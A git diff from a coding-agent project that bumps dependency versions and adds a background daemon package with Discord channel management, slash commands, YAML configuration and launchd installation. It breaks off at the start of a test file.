"https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", + "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", + "license": "MIT" + }, + "node_modules/lodash.snakecase": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/lodash.snakecase/-/lodash.snakecase-4.1.1.tgz", + "integrity": "sha512-QZ1d4xoBHYUeuouhEq3lk3Uq7ldgyFXGBhg04+oRLnIz8o9T65Eh+8YdroUwn846zchkA9yDsDl5CVVaV2nqYw==", + "license": "MIT" + }, "node_modules/long": { "version": "5.3.2", "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz", @@ -6663,6 +6960,12 @@ "node": "20 || >=22" } }, + "node_modules/magic-bytes.js": { + "version": "1.13.0", + "resolved": "https://registry.npmjs.org/magic-bytes.js/-/magic-bytes.js-1.13.0.tgz", + "integrity": "sha512-afO2mnxW7GDTXMm5/AoN1WuOcdoKhtgXjIvHmobqTD1grNplhGdv3PFOyjCVmrnOZBIT/gD/koDKpYG+0mvHcg==", + "license": "MIT" + }, "node_modules/magic-string": { "version": "0.30.21", "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz", @@ -7087,9 +7390,9 @@ } }, "node_modules/path-expression-matcher": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.1.3.tgz", - "integrity": "sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==", + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.4.0.tgz", + "integrity": "sha512-s4DQMxIdhj3jLFWd9LxHOplj4p9yQ4ffMGowFf3cpEgrrJjEhN0V5nxw4Ye1EViAGDoL4/1AeO6qHpqYPOzE4Q==", "funding": [ { "type": "github", @@ -7127,9 +7430,9 @@ } }, "node_modules/path-to-regexp": { - "version": "8.3.0", - "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.3.0.tgz", - "integrity": "sha512-7jdwVIRtsP8MYpdXSwOS0YdD0Du+qOoF/AEPIt88PcCFrZCzx41oxku1jD88hZBwbNUIEfpqvuhjFaMAqMTWnA==", + "version": "8.4.2", + "resolved": 
"https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.4.2.tgz", + "integrity": "sha512-qRcuIdP69NPm4qbACK+aDogI5CBDMi1jKe0ry5rSQJz8JVLsC7jV8XpiJjGRLLol3N+R5ihGYcrPLTno6pAdBA==", "license": "MIT", "funding": { "type": "opencollective", @@ -7149,9 +7452,9 @@ "license": "ISC" }, "node_modules/picomatch": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz", - "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==", + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", "license": "MIT", "engines": { "node": ">=12" @@ -7999,9 +8302,9 @@ } }, "node_modules/strnum": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.0.tgz", - "integrity": "sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==", + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", + "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", "funding": [ { "type": "github", @@ -8139,6 +8442,12 @@ "integrity": "sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==", "license": "MIT" }, + "node_modules/ts-mixer": { + "version": "6.0.4", + "resolved": "https://registry.npmjs.org/ts-mixer/-/ts-mixer-6.0.4.tgz", + "integrity": "sha512-ufKpbmrugz5Aou4wcr5Wc1UUFWOLhq+Fm6qa6P0w0K5Qw2yhaUoiWszhCVuNQyNwrlGiscHOmqYoAox1PtvgjA==", + "license": "MIT" + }, "node_modules/tslib": { "version": "2.8.1", "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", @@ -8295,9 +8604,9 @@ } }, "node_modules/vite": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.1.tgz", - "integrity": 
"sha512-w+N7Hifpc3gRjZ63vYBXA56dvvRlNWRczTdmCBBa+CotUzAPf5b7YMdMR/8CQoeYE5LX3W4wj6RYTgonm1b9DA==", + "version": "7.3.2", + "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.2.tgz", + "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==", "dev": true, "license": "MIT", "peer": true, @@ -8991,9 +9300,9 @@ "license": "ISC" }, "node_modules/yaml": { - "version": "2.8.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.2.tgz", - "integrity": "sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==", + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.3.tgz", + "integrity": "sha512-AvbaCLOO2Otw/lW5bmh9d/WEdcDFdQp2Z2ZUH3pX9U2ihyUY0nvLv7J6TrWowklRGPYbB/IuIMfYgxaCPg5Bpg==", "license": "ISC", "bin": { "yaml": "bin.mjs" @@ -9116,6 +9425,66 @@ } } }, + "packages/daemon": { + "name": "@gsd-build/daemon", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@anthropic-ai/sdk": "^0.52.0", + "@gsd-build/rpc-client": "^2.52.0", + "discord.js": "^14.25.1", + "yaml": "^2.8.0", + "zod": "^3.24.0" + }, + "bin": { + "gsd-daemon": "dist/cli.js" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + } + }, + "packages/daemon/node_modules/@anthropic-ai/sdk": { + "version": "0.52.0", + "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.52.0.tgz", + "integrity": "sha512-d4c+fg+xy9e46c8+YnrrgIQR45CZlAi7PwdzIfDXDM6ACxEZli1/fxhURsq30ZpMZy6LvSkr41jGq5aF5TD7rQ==", + "license": "MIT", + "bin": { + "anthropic-ai-sdk": "bin/cli" + } + }, + "packages/daemon/node_modules/zod": { + "version": "3.25.76", + "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", + "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/colinhacks" + } + 
}, + "packages/mcp-server": { + "name": "@gsd-build/mcp-server", + "version": "2.52.0", + "license": "MIT", + "dependencies": { + "@gsd-build/rpc-client": "^2.52.0", + "@modelcontextprotocol/sdk": "^1.27.1", + "zod": "^4.0.0" + }, + "bin": { + "gsd-mcp-server": "dist/cli.js" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + } + }, "packages/native": { "name": "@gsd/native", "version": "0.1.0", @@ -9166,7 +9535,7 @@ }, "packages/pi-coding-agent": { "name": "@gsd/pi-coding-agent", - "version": "2.40.0", + "version": "2.66.1", "dependencies": { "@mariozechner/jiti": "^2.6.2", "@silvia-odwyer/photon-node": "^0.3.4", @@ -9208,6 +9577,14 @@ "koffi": "^2.9.0" } }, + "packages/rpc-client": { + "name": "@gsd-build/rpc-client", + "version": "2.52.0", + "license": "MIT", + "engines": { + "node": ">=22.0.0" + } + }, "studio": { "name": "@gsd/studio", "version": "0.0.0", diff --git a/package.json b/package.json index 2ff80fd7a..949928fb7 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "gsd-pi", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD — Get Shit Done coding agent", "license": "MIT", "repository": { @@ -53,10 +53,13 @@ "copy-resources": "node scripts/copy-resources.cjs", "copy-themes": "node scripts/copy-themes.cjs", "copy-export-html": "node scripts/copy-export-html.cjs", - "test:unit": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts", + "test:compile": "node scripts/compile-tests.mjs", + "test:unit": "npm run test:compile && node --import ./scripts/dist-test-resolve.mjs --experimental-test-isolation=process --test-reporter=./scripts/test-reporter-compact.mjs --test 'dist-test/src/tests/*.test.js' 'dist-test/src/resources/extensions/gsd/tests/*.test.js' 
'dist-test/src/resources/extensions/gsd/tests/*.test.mjs' 'dist-test/src/resources/extensions/shared/tests/*.test.js' 'dist-test/src/resources/extensions/claude-code-cli/tests/*.test.js' 'dist-test/src/resources/extensions/github-sync/tests/*.test.js' 'dist-test/src/resources/extensions/universal-config/tests/*.test.js' 'dist-test/src/resources/extensions/voice/tests/*.test.js' 'dist-test/src/resources/extensions/mcp-client/tests/*.test.js'", + "test:packages": "node --test packages/pi-coding-agent/dist/core/*.test.js", "test:marketplace": "GSD_TEST_CLONE_MARKETPLACES=1 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/claude-import-tui.test.ts src/resources/extensions/gsd/tests/plugin-importer-live.test.ts src/tests/marketplace-discovery.test.ts", - "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=50 --lines=50 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts", - "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*integration*.test.ts src/tests/integration/*.test.ts", + "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=40 --lines=40 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --experimental-test-isolation=process --test 
src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts src/resources/extensions/shared/tests/*.test.ts", + "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test 'src/tests/integration/*.test.ts' 'src/resources/extensions/gsd/tests/integration/*.test.ts' 'src/resources/extensions/async-jobs/*.test.ts' 'src/resources/extensions/browser-tools/tests/*.test.mjs'", + "pretest": "npm run typecheck:extensions", "test": "npm run test:unit && npm run test:integration", "test:smoke": "node --experimental-strip-types tests/smoke/run.ts", "test:fixtures": "node --experimental-strip-types tests/fixtures/run.ts", @@ -134,10 +137,12 @@ "@types/node": "^24.12.0", "@types/picomatch": "^4.0.2", "c8": "^11.0.0", + "esbuild": "^0.25.12", "jiti": "^2.6.1", "typescript": "^5.4.0" }, "optionalDependencies": { + "@anthropic-ai/claude-agent-sdk": "^0.2.83", "@gsd-build/engine-darwin-arm64": ">=2.10.2", "@gsd-build/engine-darwin-x64": ">=2.10.2", "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2", diff --git a/packages/daemon/package.json b/packages/daemon/package.json new file mode 100644 index 000000000..74060981f --- /dev/null +++ b/packages/daemon/package.json @@ -0,0 +1,48 @@ +{ + "name": "@gsd-build/daemon", + "version": "0.1.0", + "description": "GSD daemon — background process for project monitoring and Discord integration", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/daemon" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "bin": { + "gsd-daemon": "./dist/cli.js" + }, + "scripts": { + "build": "tsc", + "test": "node --test dist/daemon.test.js" + }, + "dependencies": { + "@anthropic-ai/sdk": "^0.52.0", 
+ "@gsd-build/rpc-client": "^2.52.0", + "discord.js": "^14.25.1", + "yaml": "^2.8.0", + "zod": "^3.24.0" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ] +} diff --git a/packages/daemon/src/channel-manager.ts b/packages/daemon/src/channel-manager.ts new file mode 100644 index 000000000..b0ae1604c --- /dev/null +++ b/packages/daemon/src/channel-manager.ts @@ -0,0 +1,223 @@ +/** + * ChannelManager — manages per-project Discord text channels under a + * 'GSD Projects' category, with archive support. + * + * Pure helper `sanitizeChannelName` exported separately for testability. + */ + +import { + ChannelType, + PermissionFlagsBits, + type Guild, + type CategoryChannel, + type TextChannel, + type GuildBasedChannel, +} from 'discord.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +const DEFAULT_CATEGORY_NAME = 'GSD Projects'; +const ARCHIVE_CATEGORY_NAME = 'GSD Archive'; +const CHANNEL_PREFIX = 'gsd-'; +const MAX_CHANNEL_NAME_LENGTH = 100; // Discord's limit + +// --------------------------------------------------------------------------- +// Pure helpers — exported for testability +// --------------------------------------------------------------------------- + +/** + * Sanitize a project directory path into a valid Discord channel name. + * + * - Takes the basename of the path + * - Lowercases + * - Replaces non-alphanumeric (except hyphens) with hyphens + * - Collapses consecutive hyphens + * - Trims leading/trailing hyphens + * - Prefixes with 'gsd-' + * - Caps total length at 100 chars (Discord limit) + * + * Returns 'gsd-unnamed' for empty/whitespace-only inputs. 
+ */ +export function sanitizeChannelName(projectDir: string): string { + // Extract basename — handle both forward and back slashes + const parts = projectDir.replace(/\\/g, '/').split('/'); + let basename = parts[parts.length - 1] ?? ''; + + // Trim whitespace + basename = basename.trim(); + + // Fallback for empty basename + if (!basename) { + return 'gsd-unnamed'; + } + + // Lowercase + let name = basename.toLowerCase(); + + // Replace non-alphanumeric (except hyphens) with hyphens + name = name.replace(/[^a-z0-9-]/g, '-'); + + // Collapse consecutive hyphens + name = name.replace(/-{2,}/g, '-'); + + // Trim leading/trailing hyphens + name = name.replace(/^-+|-+$/g, ''); + + // Fallback if nothing remains after sanitization + if (!name) { + return 'gsd-unnamed'; + } + + // Prefix + const prefixed = `${CHANNEL_PREFIX}${name}`; + + // Cap at max length + if (prefixed.length > MAX_CHANNEL_NAME_LENGTH) { + // Truncate and remove any trailing hyphen from the cut + return prefixed.slice(0, MAX_CHANNEL_NAME_LENGTH).replace(/-+$/, ''); + } + + return prefixed; +} + +// --------------------------------------------------------------------------- +// ChannelManager class +// --------------------------------------------------------------------------- + +export interface ChannelManagerOptions { + guild: Guild; + logger: Logger; + categoryName?: string; +} + +export class ChannelManager { + private readonly guild: Guild; + private readonly logger: Logger; + private readonly categoryName: string; + + private categoryCache: CategoryChannel | null = null; + private archiveCategoryCache: CategoryChannel | null = null; + + constructor(opts: ChannelManagerOptions) { + this.guild = opts.guild; + this.logger = opts.logger; + this.categoryName = opts.categoryName ?? DEFAULT_CATEGORY_NAME; + } + + /** + * Find or create the project category channel. + * Caches the result — subsequent calls return the cached category. 
+   */
+  async resolveCategory(): Promise<CategoryChannel> {
+    if (this.categoryCache) {
+      return this.categoryCache;
+    }
+
+    const existing = this.findCategoryByName(this.categoryName);
+    if (existing) {
+      this.categoryCache = existing;
+      this.logger.debug('category resolved from cache', { name: this.categoryName, id: existing.id });
+      return existing;
+    }
+
+    // Create the category
+    const created = await this.guild.channels.create({
+      name: this.categoryName,
+      type: ChannelType.GuildCategory,
+    });
+
+    this.categoryCache = created as CategoryChannel;
+    this.logger.info('category created', { name: this.categoryName, id: created.id });
+    return this.categoryCache;
+  }
+
+  /**
+   * Create a text channel for a project under the GSD Projects category.
+   * Channel name is derived from the project directory path.
+   */
+  async createProjectChannel(projectDir: string): Promise<TextChannel> {
+    const name = sanitizeChannelName(projectDir);
+    const category = await this.resolveCategory();
+
+    const channel = await this.guild.channels.create({
+      name,
+      type: ChannelType.GuildText,
+      parent: category.id,
+    });
+
+    this.logger.info('project channel created', {
+      name,
+      channelId: channel.id,
+      categoryId: category.id,
+      projectDir,
+    });
+
+    return channel as TextChannel;
+  }
+
+  /**
+   * Archive a channel by moving it to the 'GSD Archive' category and
+   * setting permission overwrite to deny ViewChannel for @everyone.
+   */
+  async archiveChannel(channelId: string): Promise<void> {
+    const archive = await this.resolveArchiveCategory();
+
+    const channel = this.guild.channels.cache.get(channelId);
+    if (!channel) {
+      this.logger.warn('archive target not found', { channelId });
+      return;
+    }
+
+    if (!('edit' in channel) || typeof channel.edit !== 'function') {
+      this.logger.warn('archive target is not editable', { channelId, type: channel.type });
+      return;
+    }
+
+    await channel.edit({
+      parent: archive.id,
+      permissionOverwrites: [
+        {
+          id: this.guild.id, // @everyone role ID matches guild ID
+          deny: [PermissionFlagsBits.ViewChannel],
+        },
+      ],
+    });
+
+    this.logger.info('channel archived', { channelId, archiveCategoryId: archive.id });
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private helpers
+  // ---------------------------------------------------------------------------
+
+  private findCategoryByName(name: string): CategoryChannel | null {
+    const match = this.guild.channels.cache.find(
+      (ch: GuildBasedChannel) => ch.type === ChannelType.GuildCategory && ch.name === name,
+    );
+    return (match as CategoryChannel) ??
+null;
+  }
+
+  private async resolveArchiveCategory(): Promise<CategoryChannel> {
+    if (this.archiveCategoryCache) {
+      return this.archiveCategoryCache;
+    }
+
+    const existing = this.findCategoryByName(ARCHIVE_CATEGORY_NAME);
+    if (existing) {
+      this.archiveCategoryCache = existing;
+      return existing;
+    }
+
+    const created = await this.guild.channels.create({
+      name: ARCHIVE_CATEGORY_NAME,
+      type: ChannelType.GuildCategory,
+    });
+
+    this.archiveCategoryCache = created as CategoryChannel;
+    this.logger.info('archive category created', { name: ARCHIVE_CATEGORY_NAME, id: created.id });
+    return this.archiveCategoryCache;
+  }
+}
diff --git a/packages/daemon/src/cli.ts b/packages/daemon/src/cli.ts
new file mode 100644
index 000000000..5449ad761
--- /dev/null
+++ b/packages/daemon/src/cli.ts
@@ -0,0 +1,96 @@
+#!/usr/bin/env node
+import { parseArgs } from 'node:util';
+import { fileURLToPath } from 'node:url';
+import { resolve, dirname } from 'node:path';
+import { resolveConfigPath, loadConfig } from './config.js';
+import { Logger } from './logger.js';
+import { Daemon } from './daemon.js';
+import { install, uninstall, status } from './launchd.js';
+
+const USAGE = `Usage: gsd-daemon [options]
+
+Options:
+  --config <path>   Path to YAML config file (default: ~/.gsd/daemon.yaml)
+  --verbose         Print log entries to stderr in addition to the log file
+  --install         Install the launchd LaunchAgent (auto-starts on login)
+  --uninstall       Uninstall the launchd LaunchAgent
+  --status          Show launchd agent status (registered, PID, exit code)
+  --help            Show this help message and exit
+`;
+
+async function main(): Promise<void> {
+  const { values } = parseArgs({
+    options: {
+      config: { type: 'string', short: 'c' },
+      verbose: { type: 'boolean', short: 'v', default: false },
+      install: { type: 'boolean', default: false },
+      uninstall: { type: 'boolean', default: false },
+      status: { type: 'boolean', default: false },
+      help: { type: 'boolean', short: 'h', default: false },
+    },
+    strict: true,
+  });
+
+  if (values.help)
{ + process.stdout.write(USAGE); + process.exit(0); + } + + // --- launchd commands (dispatch before Daemon creation) --- + + if (values.install) { + const configPath = resolveConfigPath(values.config); + const thisFile = fileURLToPath(import.meta.url); + const scriptPath = resolve(dirname(thisFile), 'cli.js'); + + install({ + nodePath: process.execPath, + scriptPath, + configPath, + }); + process.stdout.write('gsd-daemon: launchd agent installed and loaded.\n'); + process.exit(0); + } + + if (values.uninstall) { + uninstall(); + process.stdout.write('gsd-daemon: launchd agent uninstalled.\n'); + process.exit(0); + } + + if (values.status) { + const result = status(); + if (!result.registered) { + process.stdout.write('gsd-daemon: not registered with launchd.\n'); + } else if (result.pid != null) { + process.stdout.write( + `gsd-daemon: running (PID ${result.pid}, last exit status: ${result.lastExitStatus ?? 'n/a'})\n`, + ); + } else { + process.stdout.write( + `gsd-daemon: registered but not running (last exit status: ${result.lastExitStatus ?? 'n/a'})\n`, + ); + } + process.exit(0); + } + + // --- normal daemon start --- + + const configPath = resolveConfigPath(values.config); + const config = loadConfig(configPath); + + const logger = new Logger({ + filePath: config.log.file, + level: config.log.level, + verbose: values.verbose, + }); + + const daemon = new Daemon(config, logger); + await daemon.start(); +} + +main().catch((err: unknown) => { + const msg = err instanceof Error ? err.message : String(err); + process.stderr.write(`gsd-daemon: fatal: ${msg}\n`); + process.exit(1); +}); diff --git a/packages/daemon/src/commands.ts b/packages/daemon/src/commands.ts new file mode 100644 index 000000000..d46d92269 --- /dev/null +++ b/packages/daemon/src/commands.ts @@ -0,0 +1,110 @@ +/** + * Slash command definitions, guild-scoped registration, and status formatting. + * + * Commands are registered per-guild (not globally) for instant availability. 
+ * Registration failures are non-fatal — the bot continues without slash commands. + */ + +import { + SlashCommandBuilder, + REST, + Routes, + type RESTPostAPIChatInputApplicationCommandsJSONBody, +} from 'discord.js'; +import type { ManagedSession } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Command definitions +// --------------------------------------------------------------------------- + +/** + * Build the array of slash command JSON payloads for guild registration. + */ +export function buildCommands(): RESTPostAPIChatInputApplicationCommandsJSONBody[] { + return [ + new SlashCommandBuilder() + .setName('gsd-status') + .setDescription('Show status of all active GSD sessions') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-start') + .setDescription('Start a new GSD session') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-stop') + .setDescription('Stop a running GSD session') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-verbose') + .setDescription('Set event verbosity level for this channel') + .addStringOption((option) => + option + .setName('level') + .setDescription('Verbosity level') + .setRequired(false) + .addChoices( + { name: 'default', value: 'default' }, + { name: 'verbose', value: 'verbose' }, + { name: 'quiet', value: 'quiet' }, + ), + ) + .toJSON(), + ]; +} + +// --------------------------------------------------------------------------- +// Guild-scoped registration +// --------------------------------------------------------------------------- + +/** + * Register slash commands for a specific guild via PUT. + * Non-fatal: logs errors and returns false on failure. 
+ */ +export async function registerGuildCommands( + rest: REST, + clientId: string, + guildId: string, + commands: RESTPostAPIChatInputApplicationCommandsJSONBody[], + logger?: Logger, +): Promise { + try { + await rest.put( + Routes.applicationGuildCommands(clientId, guildId), + { body: commands }, + ); + logger?.info('commands registered', { count: commands.length, guildId }); + return true; + } catch (err) { + const message = err instanceof Error ? err.message : String(err); + logger?.warn('command registration failed', { + guildId, + error: message, + }); + return false; + } +} + +// --------------------------------------------------------------------------- +// Status formatting +// --------------------------------------------------------------------------- + +/** + * Format session list for /gsd-status reply. + * Shows projectName, status, duration, and cost for each session. + * Returns 'No active sessions.' if the array is empty. + */ +export function formatSessionStatus(sessions: ManagedSession[]): string { + if (sessions.length === 0) { + return 'No active sessions.'; + } + + const lines = sessions.map((s) => { + const durationMs = Date.now() - s.startTime; + const durationMin = Math.floor(durationMs / 60_000); + const cost = s.cost.totalCost.toFixed(4); + return `• **${s.projectName}** — ${s.status} (${durationMin}m, $${cost})`; + }); + + return lines.join('\n'); +} diff --git a/packages/daemon/src/config.ts b/packages/daemon/src/config.ts new file mode 100644 index 000000000..c1dddbbd6 --- /dev/null +++ b/packages/daemon/src/config.ts @@ -0,0 +1,137 @@ +import { readFileSync, existsSync } from 'node:fs'; +import { homedir } from 'node:os'; +import { resolve } from 'node:path'; +import { parse as parseYaml } from 'yaml'; +import type { DaemonConfig, LogLevel } from './types.js'; + +const VALID_LOG_LEVELS: ReadonlySet = new Set(['debug', 'info', 'warn', 'error']); + +/** Expand leading ~ to the user's home directory. 
*/ +function expandTilde(p: string): string { + if (p.startsWith('~/') || p === '~') { + return resolve(homedir(), p.slice(2) || '.'); + } + return p; +} + +/** Default config values when no file is present or fields are missing. */ +function defaults(): DaemonConfig { + return { + discord: undefined, + projects: { scan_roots: [] }, + log: { + file: resolve(homedir(), '.gsd', 'daemon.log'), + level: 'info', + max_size_mb: 50, + }, + }; +} + +/** + * Resolve the config file path. + * Priority: explicit CLI arg → GSD_DAEMON_CONFIG env → ~/.gsd/daemon.yaml + */ +export function resolveConfigPath(cliPath?: string): string { + if (cliPath) return expandTilde(cliPath); + const envPath = process.env['GSD_DAEMON_CONFIG']; + if (envPath) return expandTilde(envPath); + return resolve(homedir(), '.gsd', 'daemon.yaml'); +} + +/** + * Validate and normalise a raw parsed object into a DaemonConfig. + * Missing/invalid fields are filled with defaults. Invalid log level falls back to 'info'. + */ +export function validateConfig(raw: unknown): DaemonConfig { + const def = defaults(); + + if (raw == null || typeof raw !== 'object') return def; + const obj = raw as Record; + + // --- discord --- + let discord: DaemonConfig['discord'] = undefined; + if (obj['discord'] != null && typeof obj['discord'] === 'object') { + const d = obj['discord'] as Record; + discord = { + token: typeof d['token'] === 'string' ? d['token'] : '', + guild_id: typeof d['guild_id'] === 'string' ? d['guild_id'] : '', + owner_id: typeof d['owner_id'] === 'string' ? d['owner_id'] : '', + ...(typeof d['dm_on_blocker'] === 'boolean' ? { dm_on_blocker: d['dm_on_blocker'] } : {}), + ...(typeof d['control_channel_id'] === 'string' ? { control_channel_id: d['control_channel_id'] } : {}), + }; + + // Parse orchestrator sub-block + if (d['orchestrator'] != null && typeof d['orchestrator'] === 'object') { + const orc = d['orchestrator'] as Record; + discord.orchestrator = { + ...(typeof orc['model'] === 'string' ? 
{ model: orc['model'] } : {}),
+        ...(typeof orc['max_tokens'] === 'number' && orc['max_tokens'] > 0 ? { max_tokens: orc['max_tokens'] } : {}),
+      };
+    }
+  }
+
+  // --- projects ---
+  let scanRoots: string[] = [];
+  if (obj['projects'] != null && typeof obj['projects'] === 'object') {
+    const p = obj['projects'] as Record<string, unknown>;
+    if (Array.isArray(p['scan_roots'])) {
+      scanRoots = (p['scan_roots'] as unknown[])
+        .filter((s): s is string => typeof s === 'string')
+        .map(expandTilde);
+    }
+  }
+
+  // --- log ---
+  let logFile = def.log.file;
+  let logLevel: LogLevel = def.log.level;
+  let maxSizeMb = def.log.max_size_mb;
+
+  if (obj['log'] != null && typeof obj['log'] === 'object') {
+    const l = obj['log'] as Record<string, unknown>;
+    if (typeof l['file'] === 'string') logFile = expandTilde(l['file']);
+    if (typeof l['level'] === 'string') {
+      logLevel = VALID_LOG_LEVELS.has(l['level']) ? (l['level'] as LogLevel) : 'info';
+    }
+    if (typeof l['max_size_mb'] === 'number' && l['max_size_mb'] > 0) {
+      maxSizeMb = l['max_size_mb'];
+    }
+  }
+
+  // --- env override: DISCORD_BOT_TOKEN ---
+  const envToken = process.env['DISCORD_BOT_TOKEN'];
+  if (envToken) {
+    if (!discord) {
+      discord = { token: envToken, guild_id: '', owner_id: '' };
+    } else {
+      discord = { ...discord, token: envToken };
+    }
+  }
+
+  return {
+    discord,
+    projects: { scan_roots: scanRoots },
+    log: { file: logFile, level: logLevel, max_size_mb: maxSizeMb },
+  };
+}
+
+/**
+ * Load and validate a DaemonConfig from a YAML file.
+ * If the file doesn't exist, returns defaults. If the file is malformed YAML, throws.
+ */
+export function loadConfig(configPath: string): DaemonConfig {
+  if (!existsSync(configPath)) {
+    // Still apply env-var overrides even when file is missing
+    return validateConfig(null);
+  }
+
+  const raw = readFileSync(configPath, 'utf-8');
+  let parsed: unknown;
+  try {
+    parsed = parseYaml(raw);
+  } catch (err: unknown) {
+    const msg = err instanceof Error ?
err.message : String(err); + throw new Error(`Failed to parse YAML config at ${configPath}: ${msg}`); + } + + return validateConfig(parsed); +} diff --git a/packages/daemon/src/daemon.test.ts b/packages/daemon/src/daemon.test.ts new file mode 100644 index 000000000..8519bcaf7 --- /dev/null +++ b/packages/daemon/src/daemon.test.ts @@ -0,0 +1,763 @@ +import { describe, it, afterEach, before, after } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, writeFileSync, readFileSync, rmSync, existsSync, mkdirSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir, homedir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { execFileSync, spawn } from 'node:child_process'; +import { fileURLToPath } from 'node:url'; +import { dirname } from 'node:path'; +import { resolveConfigPath, loadConfig, validateConfig } from './config.js'; +import { Logger } from './logger.js'; +import { Daemon } from './daemon.js'; +import { SessionManager } from './session-manager.js'; +import type { DaemonConfig, LogEntry } from './types.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `daemon-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while 